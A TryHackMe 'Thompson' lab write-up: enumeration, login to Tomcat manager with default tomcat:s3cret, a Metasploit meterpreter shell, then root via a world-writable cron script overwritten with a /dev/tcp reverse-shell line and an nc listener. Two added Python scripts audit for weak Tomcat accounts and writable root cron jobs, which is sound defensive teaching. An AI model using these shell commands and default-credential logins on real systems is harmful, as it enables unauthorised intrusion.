Thompson — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Thompson — TryHackMe — WriteUp. Check it out!
First, deploy the machine and run nmap to find open ports.
nmap -A -T4 -p- -v <ip>
There are 3 open ports: 22 (ssh), 8080 (http) and 8009 (ajp). Let's access the website on port 8080.
It's a default Apache website. I checked the page source but found nothing valuable. Now I'll scan for hidden directories using gobuster:
gobuster dir -u http://<ip>:8080 -w /path-to-wordlist
Two directories look suspicious: /host-manager and /manager.
First, let's access /manager.
It prompts for a username and password. I don't know them yet, so I click Cancel. Surprisingly, the page it leads to reveals a default credential:
Well, let's try again with tomcat:s3cret.
Boom! I'm in. The same credentials also work for /host-manager.
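The manager and host-manager applications accepted these credentials because the example user shipped in tomcat-users.xml was left active with manager roles. As an added defensive check (my own example code, not part of the writeup or of the Tomcat project), the Python below parses a tomcat-users.xml and flags accounts that use known example credentials, or that hold a manager/admin role with a short password. The sample XML and the list of example credentials are constructed for this example; it handles both the namespaced (Tomcat 8+) and un-namespaced file layouts.

```python
"""Audit a Tomcat tomcat-users.xml for example credentials and weak manager accounts.

Added example for this writeup; not code from the author or from Apache Tomcat.
"""
import xml.etree.ElementTree as ET

# Constructed list of credentials that appear as examples in stock Tomcat
# configuration and in tutorials (the page shows tomcat:s3cret in use).
KNOWN_EXAMPLE_CREDENTIALS = {
    ("tomcat", "s3cret"),
    ("tomcat", "tomcat"),
    ("admin", "admin"),
}

# Roles that grant access to the /manager and /host-manager applications.
MANAGER_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Minimum length we accept for a plaintext password on a privileged account
# (assumption for this example; a site policy may differ).
MIN_PASSWORD_LEN = 12

# Constructed sample mirroring the weakness on the page: the example user is
# uncommented and holds full manager and host-manager rights.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="Vm3!kq9Zt2wL7pR4" roles="manager-script"/>
  <user username="reader" password="x" roles="manager-status"/>
</tomcat-users>
"""


def _local_name(tag):
    """Strip an XML namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.split("}")[-1]


def audit_tomcat_users(xml_text):
    """Return a list of (username, finding, sorted privileged roles).

    finding is "example-credential" when the username/password pair is a
    known example, or "weak-password" when a privileged account has a short
    plaintext password. Hashed passwords are long and pass the length check.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        # Tomcat accepts either the username or the name attribute.
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        privileged = sorted(roles & MANAGER_ROLES)
        if (name, password) in KNOWN_EXAMPLE_CREDENTIALS:
            findings.append((name, "example-credential", privileged))
        elif privileged and len(password) < MIN_PASSWORD_LEN:
            findings.append((name, "weak-password", privileged))
    return findings


if __name__ == "__main__":
    for name, finding, roles in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{name}: {finding} (roles: {', '.join(roles) or 'none'})")
```

Run it against a real installation by reading conf/tomcat-users.xml into the function. Any hit means the account should be removed or given a strong password; the usual complement is to keep the RemoteAddrValve in the manager application's META-INF/context.xml so the console is only reachable from trusted addresses.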
Now I'll find a way to upload a reverse shell to the web server and gain access. There are 2 ways to do this: get a shell directly via Metasploit, or use Metasploit to generate a .war shell and access it via the browser.
*Why .war but not .php? Because:
I will use the 1st way.
msfdb init && msfconsole
Then search for a Tomcat exploit:
I found a module to use.
To exploit, you need to set the Tomcat username and password (tomcat:s3cret), RHOSTS (the machine IP) and RPORT (8080). Also change LHOST to your VPN IP.
After everything is set, run
Boom! Now I have a meterpreter shell. Look around and get the first flag in /home/jack.
Now let's get root to grab the final flag. Type "shell" to spawn a shell, then use Python to spawn a tty shell:
python -c 'import pty;pty.spawn("/bin/bash")'
There is a script called id.sh. It writes the output of the id command to test.txt. Read the content of test.txt:
Now I know there is a cron job that runs id.sh as root. So let's check whether I can modify the content of this script.
Yes I can, because its permissions are 777! So let's replace the script's content with a reverse shell and wait for the cron job to run.
cat > id.sh <<EOF
bash -i >& /dev/tcp/<your-vpn-ip>/<port> 0>&1
EOF
Check the content of id.sh again:
Now start a listener on your machine:
nc -lvnp <port>
Wait about 1 minute, and I'm root!
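The escalation worked because a root cron job executed a script that any user could modify. As an added example (my own code, not from the writeup), the Python below parses system-crontab-style lines (the format with a user field) and flags root jobs that reference a script which is group- or world-writable or not owned by root. The crontab lines and the file-metadata table are constructed so it runs offline; the stat_files helper builds the same table from a live filesystem.

```python
"""Flag cron jobs that run as root but execute scripts other users can modify.

Added example for this writeup; not code from the author.
"""
import os
import shlex
import stat

# Constructed /etc/crontab-style lines. The first mirrors the page: a root
# job running a script that lives in a user's home directory.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
* * * * * root /home/jack/id.sh
0 3 * * * root /usr/local/sbin/backup.sh
*/5 * * * * jack /home/jack/check.sh
"""

# Constructed stat-like metadata: path -> (permission bits, owner uid).
SAMPLE_FILES = {
    "/home/jack/id.sh": (0o777, 1000),         # world-writable, owned by jack
    "/usr/local/sbin/backup.sh": (0o755, 0),   # root-owned, only root can write
    "/home/jack/check.sh": (0o777, 1000),      # writable, but runs as jack, not root
}


def parse_system_crontab(text):
    """Return [(user, command)] from /etc/crontab or /etc/cron.d style text."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Five schedule fields, the user, then the rest of the line is the command.
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        jobs.append((fields[5], fields[6]))
    return jobs


def stat_files(paths):
    """Build the metadata table from the live filesystem (not used by the sample)."""
    table = {}
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        table[path] = (stat.S_IMODE(st.st_mode), st.st_uid)
    return table


def find_writable_root_jobs(crontab_text, files):
    """Return [(path, [reasons])] for root jobs whose script others can change."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue  # a job running as its own user gains nothing from this
        for token in shlex.split(command):
            if token not in files:
                continue  # not a path we have metadata for
            mode, uid = files[token]
            reasons = []
            if mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if uid != 0:
                reasons.append("not owned by root")
            if reasons:
                findings.append((token, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in find_writable_root_jobs(SAMPLE_CRONTAB, SAMPLE_FILES):
        print(f"{path}: {', '.join(reasons)}")
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d, and build the table with stat_files over every absolute path the commands mention. Each hit is fixed by moving the script to a root-owned location with mode 755 or stricter, which is exactly what would have stopped the escalation above.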
Get the final flag:
If you want to try the 2nd way, generating a .war shell and accessing it via the browser, read about it here: